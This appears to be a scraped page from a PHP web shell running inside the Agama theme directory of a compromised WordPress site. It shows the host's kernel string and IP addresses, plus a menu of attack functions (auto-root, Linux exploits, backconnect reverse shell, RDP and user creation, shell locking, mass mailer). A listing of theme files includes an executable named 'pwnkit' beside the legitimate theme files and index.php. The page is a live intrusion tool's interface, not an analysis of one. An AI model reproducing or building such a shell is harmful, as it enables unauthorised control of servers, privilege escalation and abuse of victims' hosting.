Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
themes /
agama /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
framework
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
README.txt
23.33
KB
-rw-r--r--
author.php
4.52
KB
-rw-r--r--
bbpress.php
886
B
-rw-r--r--
category.php
1.25
KB
-rw-r--r--
comments.php
2.22
KB
-rw-r--r--
editor-style-rtl.css
382
B
-rw-r--r--
editor-style.css
5.35
KB
-rw-r--r--
footer.php
953
B
-rw-r--r--
functions.php
1.54
KB
-rw-r--r--
header.php
1.85
KB
-rw-r--r--
image.php
6.37
KB
-rw-r--r--
index.php
967
B
-rw-r--r--
license.txt
17.69
KB
-rw-r--r--
page.php
708
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
rtl.css
5.51
KB
-rw-r--r--
screenshot.png
289.73
KB
-rw-r--r--
searchform.php
666
B
-rw-r--r--
sidebar.php
814
B
-rw-r--r--
style.css
90.01
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php /** * The main template file * * @author Theme Vision <support@theme-vision.com> * @package Agama * @since 1.0.0 */ // Do not allow direct access to the file. if( ! defined( 'ABSPATH' ) ) { exit; } get_header(); $is_elementor_theme_exist = function_exists( 'elementor_theme_do_location' ); if ( is_singular() ) { if ( ! $is_elementor_theme_exist || ! elementor_theme_do_location( 'single' ) ) { get_template_part( 'template-parts/single' ); } } elseif ( is_archive() || is_home() ) { if ( ! $is_elementor_theme_exist || ! elementor_theme_do_location( 'archive' ) ) { get_template_part( 'template-parts/archive' ); } } elseif ( is_search() ) { if ( ! $is_elementor_theme_exist || ! elementor_theme_do_location( 'archive' ) ) { get_template_part( 'template-parts/search' ); } } else { if ( ! $is_elementor_theme_exist || ! elementor_theme_do_location( 'single' ) ) { get_template_part( 'template-parts/404' ); } } get_footer();
Close